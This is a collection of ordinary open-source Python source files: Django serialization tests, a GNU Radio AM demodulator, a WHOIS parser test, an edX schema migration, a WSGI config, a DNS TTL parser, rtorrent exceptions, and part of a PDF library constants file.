d = models.DateField()
instance = SomeModel(dt=datetime.now(),
d=date.today(),
t=datetime.now().time())
instance.nonfield = 'hello'
data = utils.serialize_instance(instance)
instance2 = utils.deserialize_instance(SomeModel, data)
self.assertEqual(instance.nonfield, instance2.nonfield)
self.assertEqual(instance.d, instance2.d)
self.assertEqual(instance.dt.date(), instance2.dt.date())
for t1, t2 in [(instance.t, instance2.t),
(instance.dt.time(), instance2.dt.time())]:
self.assertEqual(t1.hour, t2.hour)
self.assertEqual(t1.minute, t2.minute)
self.assertEqual(t1.second, t2.second)
# AssertionError:
# datetime.time(10, 6, 28, 705776) !=
# datetime.time(10, 6, 28, 705000)
self.assertEqual(int(t1.microsecond / 1000),
int(t2.microsecond / 1000))
def test_none_child_(self):
class ChildModel(models.Model):
pass
class ParentModel(models.Model):
child = models.ForeignKey(ChildModel, null=True)
reference = ParentModel()
data = utils.serialize_instance(reference)
self.assertEqual(data['child_id'], None)
instance = utils.deserialize_instance(ParentModel, data)
self.assertEqual(instance.child, None)
|
trnewman/VT-USRP-daughterboard-drivers_python | refs/heads/master | gnuradio-core/src/python/gnuradio/blks2impl/am_demod.py | 18 | #
# Copyright 2006,2007 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, optfir
class am_demod_cf(gr.hier_block2):
"""
Generalized AM demodulation block with audio filtering.
This block demodulates a band-limited, complex down-converted AM
channel into the the original baseband signal, applying low pass
filtering to the audio output. It produces a float stream in the
range [-1.0, +1.0].
@param channel_rate: incoming sample rate of the AM baseband
@type sample_rate: integer
@param audio_decim: input to output decimation rate
@type audio_decim: integer
@param audio_pass: audio low pass filter passband frequency
@type audio_pass: float
@param audio_stop: audio low pass filter stop frequency
@type audio_stop: float
"""
def __init__(self, channel_rate, audio_decim, audio_pass, audio_stop):
gr.hier_block2.__init__(self, "am_demod_cf",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_float)) # Input signature
MAG = gr.complex_to_mag()
DCR = gr.add_const_ff(-1.0)
audio_taps = optfir.low_pass(0.5, # Filter gain
channel_rate, # Sample rate
audio_pass, # Audio passband
audio_stop, # Audio stopband
0.1, # Passband ripple
60) # Stopband attenuation
LPF = gr.fir_filter_fff(audio_decim, audio_taps)
self.connect(self, MAG, DCR, LPF, self)
class demod_10k0a3e_cf(am_demod_cf):
"""
AM demodulation block, 10 KHz channel.
This block demodulates an AM channel conformant to 10K0A3E emission
standards, such as broadcast band AM transmissions.
@param channel_rate: incoming sample rate of the AM baseband
@type sample_rate: integer
@param audio_decim: input to output decimation rate
@type audio_decim: integer
"""
def __init__(self, channel_rate, audio_decim):
am_demod_cf.__init__(self, channel_rate, audio_decim,
5000, # Audio passband
5500) # Audio stopband
|
huyphan/pyyawhois | refs/heads/master | test/record/parser/test_response_whois_nic_bo_status_available.py | 1 |
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# spec/fixtures/responses/whois.nic.bo/status_available
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisNicBoStatusAvailable(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.nic.bo/status_available.txt"
host = "whois.nic.bo"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'available')
def test_available(self):
eq_(self.record.available, True)
def test_domain(self):
eq_(self.record.domain, None)
def test_nameservers(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.nameservers)
def test_registered(self):
eq_(self.record.registered, False)
def test_created_on(self):
eq_(self.record.created_on, None)
def test_updated_on(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.updated_on)
def test_domain_id(self):
assert_raises(yawhois.exceptions.AttributeNotSupported, self.record.domain_id)
def test_expires_on(self):
eq_(self.record.expires_on, None)
|
wwj718/murp-edx | refs/heads/master | lms/djangoapps/certificates/migrations/0011_auto__del_field_generatedcertificate_certificate_id__add_field_generat.py | 188 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'GeneratedCertificate.certificate_id'
db.delete_column('certificates_generatedcertificate', 'certificate_id')
# Adding field 'GeneratedCertificate.verify_uuid'
db.add_column('certificates_generatedcertificate', 'verify_uuid',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
# Adding field 'GeneratedCertificate.download_uuid'
db.add_column('certificates_generatedcertificate', 'download_uuid',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'GeneratedCertificate.certificate_id'
db.add_column('certificates_generatedcertificate', 'certificate_id',
self.gf('django.db.models.fields.CharField')(default='', max_length=32, blank=True),
keep_default=False)
# Deleting field 'GeneratedCertificate.verify_uuid'
db.delete_column('certificates_generatedcertificate', 'verify_uuid')
# Deleting field 'GeneratedCertificate.download_uuid'
db.delete_column('certificates_generatedcertificate', 'download_uuid')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.generatedcertificate': {
'Meta': {'unique_together': "(('user', 'course_id'),)", 'object_name': 'GeneratedCertificate'},
'course_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'distinction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'download_url': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'blank': 'True'}),
'download_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'grade': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'unavailable'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'verify_uuid': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['certificates']
|
we3x/organizator | refs/heads/master | projects/backend/organizator/wsgi.py | 1 | """
WSGI config for organizator project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "organizator.settings")
application = get_wsgi_application()
|
seshin/namebench | refs/heads/master | nb_third_party/dns/ttl.py | 248 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS TTL conversion."""
import dns.exception
class BadTTL(dns.exception.SyntaxError):
pass
def from_text(text):
"""Convert the text form of a TTL to an integer.
The BIND 8 units syntax for TTLs (e.g. '1w6d4h3m10s') is supported.
@param text: the textual TTL
@type text: string
@raises dns.ttl.BadTTL: the TTL is not well-formed
@rtype: int
"""
if text.isdigit():
total = long(text)
else:
if not text[0].isdigit():
raise BadTTL
total = 0L
current = 0L
for c in text:
if c.isdigit():
current *= 10
current += long(c)
else:
c = c.lower()
if c == 'w':
total += current * 604800L
elif c == 'd':
total += current * 86400L
elif c == 'h':
total += current * 3600L
elif c == 'm':
total += current * 60L
elif c == 's':
total += current
else:
raise BadTTL("unknown unit '%s'" % c)
current = 0
if not current == 0:
raise BadTTL("trailing integer")
if total < 0L or total > 2147483647L:
raise BadTTL("TTL should be between 0 and 2^31 - 1 (inclusive)")
return total
|
cortedeltimo/SickRage | refs/heads/master | lib/rtorrent/err.py | 182 | # Copyright (c) 2013 Chris Lucas, <[email protected]>
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from rtorrent.common import convert_version_tuple_to_str
class RTorrentVersionError(Exception):
def __init__(self, min_version, cur_version):
self.min_version = min_version
self.cur_version = cur_version
self.msg = "Minimum version required: {0}".format(
convert_version_tuple_to_str(min_version))
def __str__(self):
return(self.msg)
class MethodError(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return(self.msg)
|
temmp/android-quill | refs/heads/master | jni/libhpdf-2.3.0RC2/if/python/hpdf_consts.py | 32 | ###
## * << Haru Free PDF Library 2.0.8 >> -- hpdf_consts.h
## *
## * URL http://libharu.org/
## *
## * Copyright (c) 1999-2006 Takeshi Kanno
## *
## * Permission to use, copy, modify, distribute and sell this software
## * and its documentation for any purpose is hereby granted without fee,
## * provided that the above copyright notice appear in all copies and
## * that both that copyright notice and this permission notice appear
## * in supporting documentation.
## * It is provided "as is" without express or implied warranty.
## *
##
## port to python by Li Jun
## http://groups.google.com/group/pythoncia
from hpdf_types import *
#----------------------------------------------------------------------------
HPDF_TRUE =1
HPDF_FALSE =0
HPDF_OK =0
HPDF_NOERROR =0
#----- default values -------------------------------------------------------
# buffer size which is required when we convert to character string.
HPDF_TMP_BUF_SIZ =512
HPDF_SHORT_BUF_SIZ =32
HPDF_REAL_LEN =11
HPDF_INT_LEN =11
HPDF_TEXT_DEFAULT_LEN =256
HPDF_UNICODE_HEADER_LEN =2
HPDF_DATE_TIME_STR_LEN =23
# length of each item defined in PDF
HPDF_BYTE_OFFSET_LEN =10
HPDF_OBJ_ID_LEN =7
HPDF_GEN_NO_LEN =5
# default value of Graphic State
HPDF_DEF_FONT ="Helvetica"
HPDF_DEF_PAGE_LAYOUT =HPDF_PAGE_LAYOUT_SINGLE
HPDF_DEF_PAGE_MODE =HPDF_PAGE_MODE_USE_NONE
HPDF_DEF_WORDSPACE =0
HPDF_DEF_CHARSPACE =0
HPDF_DEF_FONTSIZE =10
HPDF_DEF_HSCALING =100
HPDF_DEF_LEADING =0
HPDF_DEF_RENDERING_MODE =HPDF_FILL
HPDF_DEF_RISE =0
HPDF_DEF_RAISE =HPDF_DEF_RISE
HPDF_DEF_LINEWIDTH =1
HPDF_DEF_LINECAP =HPDF_BUTT_END
HPDF_DEF_LINEJOIN =HPDF_MITER_JOIN
HPDF_DEF_MITERLIMIT =10
HPDF_DEF_FLATNESS =1
HPDF_DEF_PAGE_NUM =1
HPDF_BS_DEF_WIDTH =1
# defalt page-size
HPDF_DEF_PAGE_WIDTH =595.276
HPDF_DEF_PAGE_HEIGHT =841.89
HPDF_VERSION_TEXT ="2.0.8"
#---------------------------------------------------------------------------
#----- compression mode ----------------------------------------------------
HPDF_COMP_NONE =0x00
HPDF_COMP_TEXT =0x01
HPDF_COMP_IMAGE =0x02
HPDF_COMP_METADATA =0x04
HPDF_COMP_ALL =0x0F
HPDF_COMP_BEST_COMPRESS =0x10
HPDF_COMP_BEST_SPEED =0x20
HPDF_COMP_MASK =0xFF
#----------------------------------------------------------------------------
#----- permission flags (only Revision 2 is supported)-----------------------
HPDF_ENABLE_READ =0
HPDF_ENABLE_PRINT =4
HPDF_ENABLE_EDIT_ALL =8
HPDF_ENABLE_COPY =16
HPDF_ENABLE_EDIT =32
#----------------------------------------------------------------------------
#------ viewer preferences definitions --------------------------------------
HPDF_HIDE_TOOLBAR =1
HPDF_HIDE_MENUBAR =2
HPDF_HIDE_WINDOW_UI =4
HPDF_FIT_WINDOW =8
HPDF_CENTER_WINDOW =16
#---------------------------------------------------------------------------
#------ limitation of object implementation (PDF1.4) -----------------------
HPDF_LIMIT_MAX_INT =2147483647
HPDF_LIMIT_MIN_INT =-2147483647
HPDF_LIMIT_MAX_REAL =32767
HPDF_LIMIT_MIN_REAL =-32767
HPDF_LIMIT_MAX_STRING_LEN =65535
HPDF_LIMIT_MAX_NAME_LEN =127
HPDF_LIMIT_MAX_ARRAY =8191
HPDF_LIMIT_MAX_DICT_ELEMENT =4095
HPDF_LIMIT_MAX_XREF_ELEMENT =8388607
HPDF_LIMIT_MAX_GSTATE =28
HPDF_LIMIT_MAX_DEVICE_N =8
HPDF_LIMIT_MAX_DEVICE_N_V15 =32
HPDF_LIMIT_MAX_CID =65535
HPDF_MAX_GENERATION_NUM =65535
HPDF_MIN_PAGE_HEIGHT =3
HPDF_MIN_PAGE_WIDTH =3
HPDF_MAX_PAGE_HEIGHT =14400
HPDF_MAX_PAGE_WIDTH =14400
HPDF_MIN_MAGNIFICATION_FACTOR =8
HPDF_MAX_MAGNIFICATION_FACTOR =3200
#---------------------------------------------------------------------------
#------ limitation of various properties -----------------------------------
HPDF_MIN_PAGE_SIZE =3
HPDF_MAX_PAGE_SIZE =14400
HPDF_MIN_HORIZONTALSCALING =10
HPDF_MAX_HORIZONTALSCALING =300
HPDF_MIN_WORDSPACE =-30
HPDF_MAX_WORDSPACE =300
HPDF_MIN_CHARSPACE =-30
HPDF_MAX_CHARSPACE =300
HPDF_MAX_FONTSIZE =300
HPDF_MAX_ZOOMSIZE =10
HPDF_MAX_LEADING =300
HPDF_MAX_LINEWIDTH =100
HPDF_MAX_DASH_PATTERN =100
HPDF_MAX_JWW_NUM =128
#----------------------------------------------------------------------------
#----- country code definition ----------------------------------------------
HPDF_COUNTRY_AF ="AF" # AFGHANISTAN
HPDF_COUNTRY_AL ="AL" # ALBANIA
HPDF_COUNTRY_DZ ="DZ" # ALGERIA
HPDF_COUNTRY_AS ="AS" # AMERICAN SAMOA
HPDF_COUNTRY_AD ="AD" # ANDORRA
HPDF_COUNTRY_AO ="AO" # ANGOLA
HPDF_COUNTRY_AI ="AI" # ANGUILLA
HPDF_COUNTRY_AQ ="AQ" # ANTARCTICA
HPDF_COUNTRY_AG ="AG" # ANTIGUA AND BARBUDA
HPDF_COUNTRY_AR ="AR" # ARGENTINA
HPDF_COUNTRY_AM ="AM" # ARMENIA
HPDF_COUNTRY_AW ="AW" # ARUBA
HPDF_COUNTRY_AU ="AU" # AUSTRALIA
HPDF_COUNTRY_AT ="AT" # AUSTRIA
HPDF_COUNTRY_AZ ="AZ" # AZERBAIJAN
HPDF_COUNTRY_BS ="BS" # BAHAMAS
HPDF_COUNTRY_BH ="BH" # BAHRAIN
HPDF_COUNTRY_BD ="BD" # BANGLADESH
HPDF_COUNTRY_BB ="BB" # BARBADOS
HPDF_COUNTRY_BY ="BY" # BELARUS
HPDF_COUNTRY_BE ="BE" # BELGIUM
HPDF_COUNTRY_BZ ="BZ" # BELIZE
HPDF_COUNTRY_BJ ="BJ" # BENIN
HPDF_COUNTRY_BM ="BM" # BERMUDA
HPDF_COUNTRY_BT ="BT" # BHUTAN
HPDF_COUNTRY_BO ="BO" # BOLIVIA
HPDF_COUNTRY_BA ="BA" # BOSNIA AND HERZEGOWINA
HPDF_COUNTRY_BW ="BW" # BOTSWANA
HPDF_COUNTRY_BV ="BV" # BOUVET ISLAND
HPDF_COUNTRY_BR ="BR" # BRAZIL
HPDF_COUNTRY_IO ="IO" # BRITISH INDIAN OCEAN TERRITORY
HPDF_COUNTRY_BN ="BN" # BRUNEI DARUSSALAM
HPDF_COUNTRY_BG ="BG" # BULGARIA
HPDF_COUNTRY_BF ="BF" # BURKINA FASO
HPDF_COUNTRY_BI ="BI" # BURUNDI
HPDF_COUNTRY_KH ="KH" # CAMBODIA
HPDF_COUNTRY_CM ="CM" # CAMEROON
HPDF_COUNTRY_CA ="CA" # CANADA
HPDF_COUNTRY_CV ="CV" # CAPE VERDE
HPDF_COUNTRY_KY ="KY" # CAYMAN ISLANDS
HPDF_COUNTRY_CF ="CF" # CENTRAL AFRICAN REPUBLIC
HPDF_COUNTRY_TD ="TD" # CHAD
HPDF_COUNTRY_CL ="CL" # CHILE
HPDF_COUNTRY_CN ="CN" # CHINA
HPDF_COUNTRY_CX ="CX" # CHRISTMAS ISLAND
HPDF_COUNTRY_CC ="CC" # COCOS (KEELING) ISLANDS
HPDF_COUNTRY_CO ="CO" # COLOMBIA
HPDF_COUNTRY_KM ="KM" # COMOROS
HPDF_COUNTRY_CG ="CG" # CONGO
HPDF_COUNTRY_CK ="CK" # COOK ISLANDS
HPDF_COUNTRY_CR ="CR" # COSTA RICA
HPDF_COUNTRY_CI ="CI" # COTE D'IVOIRE
HPDF_COUNTRY_HR ="HR" # CROATIA (local name: Hrvatska)
HPDF_COUNTRY_CU ="CU" # CUBA
HPDF_COUNTRY_CY ="CY" # CYPRUS
HPDF_COUNTRY_CZ ="CZ" # CZECH REPUBLIC
HPDF_COUNTRY_DK ="DK" # DENMARK
HPDF_COUNTRY_DJ ="DJ" # DJIBOUTI
HPDF_COUNTRY_DM ="DM" # DOMINICA
HPDF_COUNTRY_DO ="DO" # DOMINICAN REPUBLIC
HPDF_COUNTRY_TP ="TP" # EAST TIMOR
HPDF_COUNTRY_EC ="EC" # ECUADOR
HPDF_COUNTRY_EG ="EG" # EGYPT
HPDF_COUNTRY_SV ="SV" # EL SALVADOR
HPDF_COUNTRY_GQ ="GQ" # EQUATORIAL GUINEA
HPDF_COUNTRY_ER ="ER" # ERITREA
HPDF_COUNTRY_EE ="EE" # ESTONIA
HPDF_COUNTRY_ET ="ET" # ETHIOPIA
HPDF_COUNTRY_FK ="FK" # FALKLAND ISLANDS (MALVINAS)
HPDF_COUNTRY_FO ="FO" # FAROE ISLANDS
HPDF_COUNTRY_FJ ="FJ" # FIJI
HPDF_COUNTRY_FI ="FI" # FINLAND
HPDF_COUNTRY_FR ="FR" # FRANCE
HPDF_COUNTRY_FX ="FX" # FRANCE, METROPOLITAN
HPDF_COUNTRY_GF ="GF" # FRENCH GUIANA
HPDF_COUNTRY_PF ="PF" # FRENCH POLYNESIA
HPDF_COUNTRY_TF ="TF" # FRENCH SOUTHERN TERRITORIES
HPDF_COUNTRY_GA ="GA" # GABON
HPDF_COUNTRY_GM ="GM" # GAMBIA
HPDF_COUNTRY_GE ="GE" # GEORGIA
HPDF_COUNTRY_DE ="DE" # GERMANY
HPDF_COUNTRY_GH ="GH" # GHANA
HPDF_COUNTRY_GI ="GI" # GIBRALTAR
HPDF_COUNTRY_GR ="GR" # GREECE
HPDF_COUNTRY_GL ="GL" # GREENLAND
HPDF_COUNTRY_GD ="GD" # GRENADA
HPDF_COUNTRY_GP ="GP" # GUADELOUPE
HPDF_COUNTRY_GU ="GU" # GUAM
HPDF_COUNTRY_GT ="GT" # GUATEMALA
HPDF_COUNTRY_GN ="GN" # GUINEA
HPDF_COUNTRY_GW ="GW" # GUINEA-BISSAU
HPDF_COUNTRY_GY ="GY" # GUYANA
HPDF_COUNTRY_HT ="HT" # HAITI
HPDF_COUNTRY_HM ="HM" # HEARD AND MC DONALD ISLANDS
HPDF_COUNTRY_HN ="HN" # HONDURAS
HPDF_COUNTRY_HK ="HK" # HONG KONG
HPDF_COUNTRY_HU ="HU" # HUNGARY
HPDF_COUNTRY_IS ="IS" # ICELAND
HPDF_COUNTRY_IN ="IN" # INDIA
HPDF_COUNTRY_ID ="ID" # INDONESIA
HPDF_COUNTRY_IR ="IR" # IRAN (ISLAMIC REPUBLIC OF)
HPDF_COUNTRY_IQ ="IQ" # IRAQ
HPDF_COUNTRY_IE ="IE" # IRELAND
HPDF_COUNTRY_IL ="IL" # ISRAEL
HPDF_COUNTRY_IT ="IT" # ITALY
HPDF_COUNTRY_JM ="JM" # JAMAICA
HPDF_COUNTRY_JP ="JP" # JAPAN
HPDF_COUNTRY_JO ="JO" # JORDAN
HPDF_COUNTRY_KZ ="KZ" # KAZAKHSTAN
HPDF_COUNTRY_KE ="KE" # KENYA
HPDF_COUNTRY_KI ="KI" # KIRIBATI
HPDF_COUNTRY_KP ="KP" # KOREA, DEMOCRATIC PEOPLE'S REPUBLIC OF
HPDF_COUNTRY_KR ="KR" # KOREA, REPUBLIC OF
HPDF_COUNTRY_KW ="KW" # KUWAIT
HPDF_COUNTRY_KG ="KG" # KYRGYZSTAN
HPDF_COUNTRY_LA ="LA" # LAO PEOPLE'S DEMOCRATIC REPUBLIC
HPDF_COUNTRY_LV ="LV" # LATVIA
HPDF_COUNTRY_LB ="LB" # LEBANON
HPDF_COUNTRY_LS ="LS" # LESOTHO
HPDF_COUNTRY_LR ="LR" # LIBERIA
HPDF_COUNTRY_LY ="LY" # LIBYAN ARAB JAMAHIRIYA
HPDF_COUNTRY_LI ="LI" # LIECHTENSTEIN
HPDF_COUNTRY_LT ="LT" # LITHUANIA
HPDF_COUNTRY_LU ="LU" # LUXEMBOURG
HPDF_COUNTRY_MO ="MO" # MACAU
HPDF_COUNTRY_MK ="MK" # MACEDONIA, THE FORMER YUGOSLAV REPUBLIC OF
HPDF_COUNTRY_MG ="MG" # MADAGASCAR
HPDF_COUNTRY_MW ="MW" # MALAWI
HPDF_COUNTRY_MY ="MY" # MALAYSIA
HPDF_COUNTRY_MV ="MV" # MALDIVES
HPDF_COUNTRY_ML ="ML" # MALI
HPDF_COUNTRY_MT ="MT" # MALTA
HPDF_COUNTRY_MH ="MH" # MARSHALL ISLANDS
HPDF_COUNTRY_MQ ="MQ" # MARTINIQUE
HPDF_COUNTRY_MR ="MR" # MAURITANIA
HPDF_COUNTRY_MU ="MU" # MAURITIUS
HPDF_COUNTRY_YT ="YT" # MAYOTTE
HPDF_COUNTRY_MX ="MX" # MEXICO
HPDF_COUNTRY_FM ="FM" # MICRONESIA, FEDERATED STATES OF
HPDF_COUNTRY_MD ="MD" # MOLDOVA, REPUBLIC OF
HPDF_COUNTRY_MC ="MC" # MONACO
HPDF_COUNTRY_MN ="MN" # MONGOLIA
HPDF_COUNTRY_MS ="MS" # MONTSERRAT
HPDF_COUNTRY_MA ="MA" # MOROCCO
HPDF_COUNTRY_MZ ="MZ" # MOZAMBIQUE
HPDF_COUNTRY_MM ="MM" # MYANMAR
HPDF_COUNTRY_NA ="NA" # NAMIBIA
HPDF_COUNTRY_NR ="NR" # NAURU
HPDF_COUNTRY_NP ="NP" # NEPAL
HPDF_COUNTRY_NL ="NL" # NETHERLANDS
HPDF_COUNTRY_AN ="AN" # NETHERLANDS ANTILLES
HPDF_COUNTRY_NC ="NC" # NEW CALEDONIA
HPDF_COUNTRY_NZ ="NZ" # NEW ZEALAND
HPDF_COUNTRY_NI ="NI" # NICARAGUA
HPDF_COUNTRY_NE ="NE" # NIGER
HPDF_COUNTRY_NG ="NG" # NIGERIA
HPDF_COUNTRY_NU ="NU" # NIUE
HPDF_COUNTRY_NF ="NF" # NORFOLK ISLAND
HPDF_COUNTRY_MP ="MP" # NORTHERN MARIANA ISLANDS
HPDF_COUNTRY_NO ="NO" # NORWAY
HPDF_COUNTRY_OM ="OM" # OMAN
HPDF_COUNTRY_PK ="PK" # PAKISTAN
HPDF_COUNTRY_PW ="PW" # PALAU
HPDF_COUNTRY_PA ="PA" # PANAMA
HPDF_COUNTRY_PG ="PG" # PAPUA NEW GUINEA
HPDF_COUNTRY_PY ="PY" # PARAGUAY
HPDF_COUNTRY_PE ="PE" # PERU
HPDF_COUNTRY_PH ="PH" # PHILIPPINES
HPDF_COUNTRY_PN ="PN" # PITCAIRN
HPDF_COUNTRY_PL ="PL" # POLAND
HPDF_COUNTRY_PT ="PT" # PORTUGAL
HPDF_COUNTRY_PR ="PR" # PUERTO RICO
HPDF_COUNTRY_QA ="QA" # QATAR
HPDF_COUNTRY_RE ="RE" # REUNION
HPDF_COUNTRY_RO ="RO" # ROMANIA
HPDF_COUNTRY_RU ="RU" # RUSSIAN FEDERATION
HPDF_COUNTRY_RW ="RW" # RWANDA
HPDF_COUNTRY_KN ="KN" # SAINT KITTS AND NEVIS
HPDF_COUNTRY_LC ="LC" # SAINT LUCIA
HPDF_COUNTRY_VC ="VC" # SAINT VINCENT AND THE GRENADINES
HPDF_COUNTRY_WS ="WS" # SAMOA
HPDF_COUNTRY_SM ="SM" # SAN MARINO
HPDF_COUNTRY_ST ="ST" # SAO TOME AND PRINCIPE
HPDF_COUNTRY_SA ="SA" # SAUDI ARABIA
HPDF_COUNTRY_SN ="SN" # SENEGAL
HPDF_COUNTRY_SC ="SC" # SEYCHELLES
HPDF_COUNTRY_SL ="SL" # SIERRA LEONE
HPDF_COUNTRY_SG ="SG" # SINGAPORE
HPDF_COUNTRY_SK ="SK" # SLOVAKIA (Slovak Republic)
HPDF_COUNTRY_SI ="SI" # SLOVENIA
HPDF_COUNTRY_SB ="SB" # SOLOMON ISLANDS
HPDF_COUNTRY_SO ="SO" # SOMALIA
HPDF_COUNTRY_ZA ="ZA" # SOUTH AFRICA
HPDF_COUNTRY_ES ="ES" # SPAIN
HPDF_COUNTRY_LK ="LK" # SRI LANKA
HPDF_COUNTRY_SH ="SH" # ST. HELENA
HPDF_COUNTRY_PM ="PM" # ST. PIERRE AND MIQUELON
HPDF_COUNTRY_SD ="SD" # SUDAN
HPDF_COUNTRY_SR ="SR" # SURINAME
HPDF_COUNTRY_SJ ="SJ" # SVALBARD AND JAN MAYEN ISLANDS
HPDF_COUNTRY_SZ ="SZ" # SWAZILAND
HPDF_COUNTRY_SE ="SE" # SWEDEN
HPDF_COUNTRY_CH ="CH" # SWITZERLAND
HPDF_COUNTRY_SY ="SY" # SYRIAN ARAB REPUBLIC
HPDF_COUNTRY_TW ="TW" # TAIWAN, PROVINCE OF CHINA
